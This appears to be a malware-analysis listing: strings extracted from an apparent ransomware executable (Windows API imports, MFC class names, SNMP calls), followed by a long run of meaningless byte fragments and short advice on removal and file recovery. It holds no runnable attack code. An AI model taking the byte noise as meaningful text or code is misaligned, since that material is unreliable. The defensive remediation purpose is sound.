FlushFileBuffers
GetCurrentProcess
HeapFree
HeapAlloc
VirtualAlloc
GetSystemInfo
VirtualQuery
GetStartupInfoA
GetCommandLineA
ExitProcess
RtlUnwind
HeapReAlloc
HeapSize
TerminateProcess
HeapDestroy
HeapCreate
VirtualFree
IsBadWritePtr
GetStdHandle
UnhandledExceptionFilter
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
GetFileType
QueryPerformanceCounter
GetTickCount
GetSystemTimeAsFileTime
SetUnhandledExceptionFilter
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
IsBadReadPtr
IsBadCodePtr
SetStdHandle
KERNEL32.dll
UnregisterClassA
GetSubMenu
GetMenuItemCount
GetMenuItemID
GetMenuState
EnableWindow
IsWindowEnabled
GetLastActivePopup
GetWindowLongA
GetParent
MessageBoxA
SendMessageA
UnhookWindowsHookEx
GetSysColorBrush
GetSysColor
ReleaseDC
GetDC
GetSystemMetrics
LoadCursorA
ValidateRect
PeekMessageA
GetKeyState
DispatchMessageA
CallNextHookEx
SetWindowsHookExA
GetClassNameA
SetWindowTextA
GetWindowTextA
GetFocus
PtInRect
GetWindowRect
GetDlgCtrlID
GetWindow
ClientToScreen
LoadBitmapA
GetMenuCheckMarkDimensions
CheckMenuItem
EnableMenuItem
ModifyMenuA
SetMenuItemBitmaps
CopyRect
GetWindowPlacement
IsIconic
SystemParametersInfoA
SetWindowPos
SetWindowLongA
CallWindowProcA
DefWindowProcA
RegisterClassA
GetClassInfoA
AdjustWindowRectEx
PostMessageA
GetMenu
GetClientRect
SetForegroundWindow
MapWindowPoints
LoadIconA
GetMessagePos
GetMessageTime
DestroyWindow
GetTopWindow
GetDlgItem
GetForegroundWindow
RemovePropA
GetPropA
SetPropA
GetClassInfoExA
GetClassLongA
CreateWindowExA
GetCapture
WinHelpA
RegisterWindowMessageA
DestroyMenu
TabbedTextOutA
DrawTextA
DrawTextExA
GrayStringA
PostQuitMessage
USER32.dll
GetDeviceCaps
DeleteObject
CreateBitmap
GetClipBox
SetTextColor
SetBkColor
ExtTextOutA
SaveDC
RestoreDC
SetMapMode
PtVisible
RectVisible
TextOutA
Escape
SelectObject
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
SetWindowExtEx
ScaleWindowExtEx
DeleteDC
GetStockObject
GDI32.dll
comdlg32.dll
ClosePrinter
DocumentPropertiesA
OpenPrinterA
WINSPOOL.DRV
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
CreateStdAccessibleObject
LresultFromObject
OLEACC.dll
SnmpMgrCtl
SnmpMgrGetTrap
SnmpMgrRequest
SnmpMgrStrToOid
mgmtapi.dll
.PAX
.PAVCObject@@
.PAVCException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCInvalidArgException@@
.?AVCObject@@
.?AVCException@@
.?AVCSimpleException@@
.?AVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCInvalidArgException@@
.?AVCOleException@@
.PAVCOleException@@
.?AVCNoTrackObject@@
.?AUCThreadData@@
.?AV_AFX_THREAD_STATE@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AUIUnknown@@
.?AUIAtlStringMgr@ATL@@
.?AVCAfxStringMgr@@
.?AVCCmdTarget@@
.?AVCMapPtrToPtr@@
.PAVCArchiveException@@
.?AVCArchiveException@@
.?AVCCmdUI@@
.?AVCHandleMap@@
.?AVXAccessible@CWnd@@
.?AVXAccessibleServer@CWnd@@
.?AVCWnd@@
.?AV_AFX_HTMLHELP_STATE@@
.?AVCTestCmdUI@@
.?AUIAccessibleProxy@@
.?AUIDispatch@@
.?AUIAccessible@@
.?AV?$IAccessibleProxyImpl@VCAccessibleProxy@ATL@@@ATL@@
.?AUIOleWindow@@
.?AVCComObjectRootBase@ATL@@
.?AV?$CComObjectRootEx@VCComSingleThreadModel@ATL@@@ATL@@
.?AVCAccessibleProxy@ATL@@
.?AV?$CMFCComObject@VCAccessibleProxy@ATL@@@@
.?AVCByteArray@@
.?AVCGdiObject@@
.?AVCMenu@@
.?AVCResourceException@@
.?AVCUserException@@
.?AVCDC@@
.?AVtype_info@@
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
learn think
behindup color
wo#3
A	n(
`q6R
?rJp
dPvL
a>ta
Kqr3
FKj0
hB*R
o9U7
WARe
8_D>
)a\Y
<;m4K
[]o|
u#hb
c,{o
V"Am
LL"xb
+Q#&
OrwV
_/1Z
eX!C
z@k`
|#;K
AP	{
WAOo
	4\n
bGR9
M~s!J
EUUS
SKh!
/'F$
t&P=X
01pN
{~rT`5
6~Vx
S7WCD2LG
1"Ax
@gil
p_1M
"uV48
]F@A
Ml3!
v2Sm
[a!I
Delj
G4RL
1k[K9
/7$Ta
Y0w4
'h`J
2hbe
J !k
xE`2
g?n8
Epe<
 3zG
-1|h
A; V
A<wk
RYfl>
UE,n
<7*^
{DciIv
)";b
,Y4a
VU-xV
|\\J|:
U93K
 iN7
'"G$
e-gI
DS C2
uk#Wq
"/D33
aBr<
y}q2
@iD@
:df4
TwSE
}*Hah
[xU8
Ayu`O>
C@*V
 T?T
KhTA
q"N+^
/;&4
O8p6P
q&Ji
c%W 
m9QH
_B.\
|)^J
jXv8
AP|<
Q.	Yp
g~g{
6O#5
Szh_
#/Z#b
tgR_u
8%7T,
+y*q
W]fl
4kVkV
(@GE
(cKV
fxul
tjm\
tVel
p7b*
~-Fs/`
_dEz
fa-i
1\/!+2W~}
]NvB
Mt^]%%
&2J+
;sJX
RK{t
kH)X
8,,-2
CmjJ|
k([Z
?gXk
[6G)
qklx
=%>|
w4\",
x-te
^8[vG
 f1o
T	/1<
fRM&
V@jJ
b ?M
lg]	
Mjw6
)u}+
3RGl
trt 
@Fy2
d4Mh
/UGU
+;XX
;/[F
o]j(
v	!t
l&Q7
ifW9{s
|P"j
ZzAjB)
\L<-
seVO
Ywy:H
^_A}
7lmN5{o
,7J$
5])a
oX[X
 ?>x
2c8'
{c#X
wZ*S
N4ivx
q!YAn
PmD-K-^
0Ij-
(hl1$
0ryZ
1h\r
rXep
x?};
v},1
6YLH
@y-Y-
,0$]J
)ct7
r}Lq
z)#Y
S$[ea
Bm{>
;^[)
EGIN[
!gLc,
<&9%
DPqg~
/`68
;NPr
yI.A
,M4t
Z^\0
1iBX
FaNw
O+G2
X,iN
Zeq/
/M&;A
FE{f
xn,5
3yy"7
$HI2
7o23
}Ey)
>t_?
G1{U8
?N{!
5H@:
V,)=
XN~ 
pgoN
"?:B
]pq9
{aj:
!%+^
b<jX
am$M
p#,;D*
\-q(
H*OE"
x2o3/
1k<d!
]|ga
8:7.
WR6K
Ntu!
t5PB
]g.	:
`)n=
5;[	
cuPe
|zVI
R%pB}r
E+gV
erPP
rU:B
+hM 
g{q%
3WLVc
^R>	
h/=a
-=_A
S.E>
Zd81z
d,(3E
nj%xS
Oh7|J
!+.z
EJS<
jh_21
sPJ@|A
Q5	'
_IpT
u`2A
^@Q1
c1n)85
Q?+[eJ
9]9"b,
_;Nwf
hhGR
[M	F
eeKK
a}wl
T@5C
x\"&
%S:S
`_g:
F4?8
TELgj
4htq6
:Ai 
BGf"
|`Gd
OIRs
eD.]evK
y Xu
zQdu
Hl>#
'OHQ
JDwd
-=Xq
_p%x
"c|$?
=I<y
dH!L
?!-C@
V57{;B(
] ;"
dhE3
~pUy
[^&;
$#BA	
Q(5Di0S
HXZ:>>
NH>d9
nKe7
SIL0
@@@dA
m[2DZ
5:&p
xU!k
XCg,
_*RN
b+9t
'^Z`j
VYWZ
EttO
ia>{&
.K	_
l <M
+?;z-
(X:%
EQ=>
-,w[
FZ]w
P(Qfb
<G|4
7're
gd_#
QW\_
FHwS3e
jdPqe
p?rS
L@3v
m|W@
4.^3
VFB9
sMXH
PB]S
lSBH
<Kc3Q
=?u.
c~H~Yj
&tH%
#7nx
&ld	#
LUw>|
wd&q
4n1_8
Sqqn
wu^g
Ls rc
[<hF
{zM6
qX,y
fO\Tp
duV4
+FOz"
M6eepW
V"^Y
JRiO
v N}
m$)kW
'63N
:nst
$Q8`t
X$-4
uhXV
GJpi8
/Ht*
9|BL
v?*z
~g0j
<L&:l`M
IwT.i
,]6N
 qv5e
Q`yD
5M?V
cnto@
,;+w
0NmcU
9J$Ofy
)_;1
9~VN0
/XF"
gRya
yFbF
=T\Q
pZrK
p9Ls
0ZJP|
]"Y7
HI290
1H:z
Y A]
UzB"
aBOC
k^-0a
}o"D
!yo>?
[s)[4
LBZI
/ZTY
JY(A
q(hnN
$-^r
(cMhaU
{F]T
_;0<
KiH"
O2hZ
-vtsY
@fb1>
gNW9
SNM!:q
.lR2
HJ/]Gc
an)G#
Y_T)
QLN3
HfcB
SLh 
N2mpk
Y5J,
U$Odb
(ANy{
h*Wa
B1OI
Up!/
,$HY
 eEf
hvl'
iU]4
`vbo
u.no
C'|]
bHD 
bCKK[
I	)'
iL'F9
oJnU
"*#W
g!YR
MnB5
e[(N
F	<&
p5,8
(.\2
O_=!
V+|V8
=%Z>
V{~?
5yFz
&	T&
Sc]N
(/mj
^_	Il
\9M?
<m\=
)^>@
ldu>
nZ;X
q{BhE
]@C-
?8'g
[5E.
MNb>P
P+OW
F4+S
5x-@
X'ytP
-nqK
ae.U
FIoR
@Tq`
5}AE
Ie,M
Ec,z
we;:~*
q+)u
H%.=
M51$
4PI&
yu@i@
?;DW
Dc_E
y$yH
.Ydh
yAG3Q
41Io
z}9y+@
S{Ad
wqnX
@HrA
>6^_
WKye
Ewit
u{D!
&)p0
'oO"h
q*;o
!,(d
YqtV_
]L|{
~5<|&
-DR7
|-l'9
DhQ9
bK)H
t$J!&
P0|[b
:6GZ
kcpB@
/*AQ
9c_@t
+TA^
_3JeUJ
4Inh<2
f[\;
{OLa
qGZ7
\p^|X
	HV@
dm/q
n)V<
TA,]
Otg@
E(tb
}x]^
+MhY
`^sq
?G\f
Co/R_
*C:zn*
4 <S
rEY]
l_3H&
ABCb
g^#!P
$*M:
\-QJ
B:ff
_!Pc
%Y!{
l$MJK
X =>
.}Ei
_MR[
F[izj/[
WOlk
R#H	
_ii>
YHEm
x	sC
&;]"9
6 5.
3G?	
ZkqK
F!XKY
"<r#
V+w6t5
wo@=2
*00t
]1ms
e?E1P
*x!W
{^{>
U7EX
^Tw_
CJ+f
&EGi
xea'
Jif&i
=vSj
_[6W
nnaO
@Gev
pOv'
qMqv
N"&Q~
x:l3#:
xBpF
9>Ir
sj8f
RAMY
~;!'/
0D##
Al*=
;8aEc
</2a
GL5|
	p_'N
@a^:
@Ld'
Sw#a
\VD&
(qPS
_DJW
h: *])
|0zJ_
OX00
j`a1
6"9,
])]Z
QZG9#
	s)L
]XF^
o<[S
r{rb
T:eJ
H^N0
Q3n+
/{uo
qN_sW
|a5MI
SQ$S
{yW#
	5hHk
U6%j
xWjN+
>[4C
^^6A
A	Jw
Vi:q
[Wy6
S,I!W
)06>
7F?{
XR"#)
B#T^
3/;{
q"yO
C|@0
V3cB
4mMC
kd=zh
AGn@
ROMI
A"{`
gr[|
l/C;
u$q,
4ecQ
	=hHNO
YtP~
w\3}
=FCpF
=TOM
^	\oz
hBfkJ
=D&]P
M\,T
N<JB
"~ZZn
@Ya|
D0z<d
#R;"
Eh,T
e%;*
d-pY
1UNP
z79m
_,`+
J&:a
~fL	4
w4j]T
Rv	U
4v}<
P[Lh~
wxQL
	 Jd#8'xEl
:	{,
KYl	4
*DMt
KPhQ
R4wCT
ei"^
G/42
edaJ
^v#1
*l@X
tWl 
]~<p
ccDK
keLU
q5D:
(-!C
)Q]T
jj\Q
c$@M
	/5\
mh<P
nNPE
Hz9}
.VTj8
3\;A
+N-9i
KQ4S
w~r"
rwh%
ZHTg
_vK 
Nag\
&5~{
hts1
]!aI
)O@:1:c
?U!#
mH*>e
Ksb{d
?]z@
xF:A
`4	>%
lSqH,
m%"|
 MRD+
9h*}Z
`v&K
)0g1
#F@d
,3@8
5Jgh
51I7
ctkx
MWk>
QV"U
d#`d
vKBK
FB{O
Ksk 
:,Ib
Kb<A
lO*X
mlx"
`W#Vx
H t7
i5d@
!BS18
tcpI
k.y.
M-lgC
+9aw
~]|L%
	mOZ
Oq5}
x3Z9
|_PV:
oKK 
 IE7
/mMg
|iU<
!e<o
wy,yo
Aj+B
!\"7
M%ne
0YzU
~toE7
v4hw
#2pU
"MNG
Z+H;
*|qh
gg-`
I[Lx
o'fs
O@x`
=n;d
5O$N
*Of[
o)T-
8 )/
t `J
t`IR
?t}@
3v,i
?Dr*
yyez
yk0c
QjZB
)^p8|
}-R29
9|Z(
@y&W9
.1H51z
%C^K;h
}PW:
:QV@
V8',
3Og8
!*YA
zG~_<AK
,"IB
Q@]E
]J8#
`%O9
#	#[4N
rdt{
x}Ax
fP0s}
04JbA
)  ^io
Y1x<<
1@GW>
Z{K0
AB30
!hkX
*vwc
\3JY
]=Q}XC[IX
kp"+
sCH1\
_dE:
Ex"-
k\p#2
(vQ{
IzPmB
N+;P3
o-@Y
\c'2
iwL`
-JZQ
$y&2
erAtc
?\xC
|I7pB
H!Gse
5.uX
Ot=d
bfp?
ail@
m@ct
o|a!
R}>2
dGb2
l5M=
+}`(f
EQ|;@
ap{7
9QiO
&8=t
QdSeB
iswA
^:U&
EK+uhq
$i<%
^"]e
(t:-
4 EJ
DaZ"
~ RH
aT7G!#}
sxOK
b.m	:
F(ik
,Oek
SB,Q+a
fmH}
[bk[
T"1F
/hFs
w{,t%
?5I]i
OHPl
0Cz3
"_G?
M8DI
raCL
mT^v
/=sU
]h+R
[U}!
Oz:C
RGc`
&JJ	
Y:q>4
"J^U
Fszv
MB	bq
>|(!
\?5C
{%|>=mT
1}p\
yt"j?
PDaO3
2\M/
/q:w
y/{c:	
e(=%]i
P(,n
w'wE
B=^EV
|)qJ
[(eT|M
|Z12~
(h!)
MnBt
3\\g[(
w.4*
}wc2
Cs:aG
Kra\e8\
>kaV
whcE
]R#Ee"7
7{2jI
w%[K(0
8fGb
6yF\IF
C\,{
b}!X
hH("
|=kB
?Zp.
sp5g
FUGRM'
rsGa
TEgl
vfpS
\r(d
@Xg-"
R^l{
QH5l
bE/`
uD4vuK
s=.`
Pai>
$)t&0
O>TD
Y@"e
F9sY{
6`fe
P=`F
tWZj
9~Ow(
vR%s
;-vN
QLL"4
nWbX
3f-zf
X89a
xE|_G
V&|>p
AQ>D
0kFo
$|'K
a3Jk
4Rd$
KBSR
rEca
` 4]<
fYDz
VNdK
4"U\
ZZM<
Zd,q
!h[n
|_@0
<SXb
KWoO
'.+l
(zQ(\
D9ODA
2k:=
8vFq
zz7z^
tLl5
4x`N
d~ehm
Wd9K
{NDG
<h&q
dM-K
:[P\b
%q2a
'=~F[
i(98
OBf%
o:l{
+SEqF
7mQC
T#]K
k}50
kdvj
AJCz
`G1^
Sh;F
%}L/
E!a1
]8CM
TFB]
P_r,
JHP2
ir4o
v	 V=
p 4_
0DtU)7
Wo0@
na!?
wq0?g
l%Alt
xQ\t
3esZ
Qe`d
r<Vk
	e/O
e`oX
(&Ev
ktSuz
ymV]_m
Ec#%n
Z)VB"J
_Z%"H1
@&+V
~fEG
>!jF"
eFOT
F&CPa
ocg`
cBxy+
gw|@
#U9%
ExD{
NWQ0
4*pI.
egp+
&fk|
Ymmk=@k
>Y;AO2?
#lY[
;x&i
yR4-
!MRV
XT	Z
_5L<
a^9O:s
dc$d
.(;	
LCS99iQ
#mcm
Q-UT
\VZ8s`n1
11..X
m/GK
eq[:^g
!\{m
UXgc
DBlj
w"s78G
+*C(
	a"j=X
d=OS	
^fh[|+
dIXS
"QrS8UO
a;-6
*4zlJ
!')S
$A $
jAFP
UO*N
(EK 
&|&r
DaE{
(j(DX
ibzz
	CWT
|U1J*
Y|va
*bb_
~KxW
fo'c
FqA\
&TvF
p2y"m
nGa/w
e?pG
R?	=
8^Ix
Lus~A
/g,8
~G5H
u]Y"
~;|#
 W6?
i`9*
j6&kt
v8w/X
{~F|Rw
=S{H
+&N^B7
jMvJ
s	Xi?
:c~n
~SS	s
vZ}]
. #\
r\jo
Cssr
QE+c
01k2?
2]>L<
Ln^"w&
tnV.
, {0
V5S}
vDzt
gWvz
AZ&PW
VT00
GVfJ
nq\)
Vd?q
%t+O
!KNVp
*:y4
wU<n
Zwyh
||7_d
Vc<3
4~W|
{cTM
/io'
-R{_
-gtD
!C7t
I)#=
aNL,
-_e"
] Sc
$Slf
|25V
{>J;
Rnk"
	V`-
RJPs
h-YvB
'As/
}p:=
h@"H
pzEJ
c6ab
ijB+
~bab
t[h$
[r=$
Kr90
J8x9
=7Ho
E?^I O
"Uqr1
FPE@C
HH,Vy
OJ e
~ES[
'l)J
`h*7
~yqnS[Y
a#D4
Q2@(
' X>
t"&P$
vP9*;_1
.IOw]
sZ<I
l2 [E
JM::
XA%CE
I%rX
n/|/)8	
rnO&;
cyKa
v+z(,
3@6<
io@@
rZa8&
iJOW
NL7	J
*^D\
O5g#?
Z'Z>
|d|'
Pbw*
U*r`p(
:ura
zdNQ
T)	+Z
w&v}
L=r?
["i<2
]!!'
k?cB
GgyY
S Bo
ZxL7)Z
1V"D
'"MR
duF3
-hBMA
A;_;
foUUn
WJgM
:IHU
j%Tm
]u!+K
=m^v
" 40
4CFZ
Q,=~
I?B*
M+^BJ
_L3@
Jb4&|
sd$>.<
Lf4}
+uY;
F8B`
bbl]
YB[L
,.iG
|}a^
f&)]
W2/l>Y0
*odR
YIFV
;"Y&
n5U)
o7a,
*j+;
P );/
)?>]
<{@e
-ufH
@P&9
rw,R
l5F	
&WA[L
?3gjX
P(<P[q
\ `W
E.pd9
xN	f
2hS"
FkM<
f(iq=
d\AV5
	dSE
P R?:
SA-]
L}N~
&P2(
FYx	$E
a7tv6
wKE]oL
|5QQ]
8w%:
=z`G
xQkd
wvy{
Fs6k
"V@=
@`>R
a+cTUH
]TZr
Q}9xR
v.1m
a2Zy
x}p"
3h9B
F.N_
D$rL
	VOS
Rk_H
3I59
'y)5
*"&-cF2	2LH
7]	z
)"P\
%UQ*
HKLEb
aZUs
 7d&
4\uj/m\)
t+^J
|Agw2
_F'!
vHN,
iGXZ
7B,>K
G~CYTx
HrVh
iN0kX
gS+m
N	/%
9B"yL`f
eOQ<
FPD47
6kvmu
45r@
w7?~
\Zz{,
I(-+
sEbU
b(vqZ
_cfR
OvP^
f=.y
&A09/4
/R!g
l/>!
A\>\
$kQg
(HPY
xo\@
,c+z
tQ5$D
Iiy4
zw?%
+hDR
LY5yi
J'3H
9WyAn
rd5m
T4Z$
cLBc
+Y=v
5!^&
	;;>
8kIB
>BK,
bXK"
OJssY
hNWc}
s64c
(q<I
DfQM\E
{!L2
}1)W
0B&D
_U=WP
b&[&
k=L4i
)g1 
;Jz=
*tkr
W!q3(
K*uv
p#T<
srtg
E) e
%*ryG
@#c;v
D2F8V
S0C0&
$.lG{o
vPK]
;ZfDVc
}jNX}o
[fRu
ywz*
-!oJ
hIRx
dVtztz
s_ug
c{V5
kR=_
\U{E
fOKD
BQwY
<XS5=
HkS:
F9l^
aR$q
	)010
f~tA
&D}u)\q
[hq:
iANq!
s*aT
kar'
dX.I
vw)Y
F fnT
1x~'
5\bA
d.i&S
}_NA
@F`{
`|dVD
N}Q-
pPsh3y
!JnJ
i$##7
dSlH
 |:T
OY[]n
n6!^
C(jhX
rX5j]o
QcB<
Dx'[
y.VS
ehO@
Y89>
A4p}
-X(I
yecfq
3yz/
4Bw 
oIHWl
~,Bp
&`z^
mX9F
[AF1
*7x;
c!?@
SkOV
$2>q
mzGk
UjP{
 %<I.
f'=G;4
<T9d}f
%iXg
%3JS
ypkq@]
F(W({
 Qk_
v3e6
_PrB=
?5h-Y~
9;p<%Z
>Nz85
9O>s
SaQ^-
y+yL
"|#k
8pRZ
#S&$
B$w|
Dh,X
zro/
 1PX
[He\
nZ4>#
vm:I	
^>Q5
 aQv
ik+zk
^~pP
AlyG
w.-Uw
2]"%/
ApGmr
4QNp3h
s#E""
@Hr8
%5I[
P6Eh
P~1 
Kx)n
if-P
Db4(S
IXZ=
-JD;
`.L9
D3W5
%W;|
^MXV.
`:an
Ft0x
$cG<d
b!s7
A1HV
,S]h
B:*a
6Qj?<
P=7d*
/+|kA
]{mg*
%vi(
GJjk
[Uho6
^BSf
ps:f
l\P%
YHox
'3G;
LwD"
zj5Y+
v<@C
4?%#
-GK>
_/fFS>
	dm@
%E,/
[vM0
xOUI
gX{p
+3?k
bAmu	
$Ht\
d_ _+
([7n
I}Ij
63j\
2VD.
J4YD:
g_7A
I b%
kAlb
TaQ U
{m#R7
&]Yw
J%PFE
yr<H
.$*MV
$	:#`m
j:|E
P&	^
QfEm
4MJS
c`Is
fl6M
bXz@?
6_9b
9XK<
y6gw+p
4pR.U
CEzN
,_{!.^
vN5l
&:+/
^lOMf
2 C\
&mI/
r'E1
3j/QE
/67'
D=WO
TYa)w
%yGZ
UX6P
91!O
(4k8Z
5Y[ 
:eeq
M+Lo6e
sO~PK]fi
,DLq;-
EGwUi
'e$`+
&Q6k
n)%5
Bf5Q
7{5o
-	uhvK
?}R1
N_}c
NaBU&
WghAV
RMR%
LR%,
F&.K/
Sva]9
i!jK
:tWUf
}mH74
Lz%P[
9HPT
J8vv
o^'BB
s\52
apll
Cw"}7
^FA>
/pyI
I+>qE
Vz%Jwj
YIiM
g+*q
GA][j
AH=t
?hOR.
l(FL
	h@Y
_"	L
;A/z
vy>|
	90jE
4XSm
$h
yx`P!
lQm&
;y!b
kXWu[
0t3i
>vl@
t'RB
<1PO$
,faK[I
;?Ql
/Lq4%F
&BD)
*sSf
fTjP
8-y]
]c]gp
yKXP
WVz[x
?z15
XDHR-
{Ji|
9!s.
E:xC
/n$9
@-t@
ku4!
XT5D-n
jJhj
n77-U
nWY,
2em(
DOn9
{*`P
YFhX
Yti-
-N=J
aW[+k
)'i>
`W[\
V140_
)W=@2
d\Uh
sv,Y
.r9m
}(t*u
)P!.
u"qa
G,?*
wQ%1
|oTV
m?DVc
\		S
`C/]J
QcF|
%ilG
B%Rm
-$KS
m`U;p
1*)I
{V-DD
p*f'
EXn(
PJ\a
<m'cv
T"+;
NxK|
+MTS
v<M.
rqpj
_7i4
yBwF
qtm{nI
C"1"
w^Md
 ]Z+
Od8@U
6p/"
w&Nb
WL  $R-
WJ$ %K*
WJ$ %K*
WJ$ %K*
K$ XQ#
iQ.')\#
N+$bN2+'>8
X4/<b>9
\60@_97
X8/B[@4
X60Rb@8
tM" .
S*$H`1$
T/(dZ1%%\4

You can use MalwareBytes to get rid of this malware. However, please keep in mind that it will effectively remove the malware but won't recover the encrypted files.

• If you have a recent backup of your data, you can restore the encrypted data.
• If you have restore points, you can try to recover previous versions of your files. See here for more details
• Besides the native Windows functionality, you can use ShadowExplorer to restore previous version of entire folders (does not work on Windows XP)
• It has been reported that it would be possible to recover encrypted files with PhotoRec. Read more: http://www.expertreviews.co.uk/general/1307248/how-to-recover-files-from-cryptolocker-for-free
• Unless you get the private key that has been used to crypt the files, there is unfortunately no other known remediation to recover your encrypted files.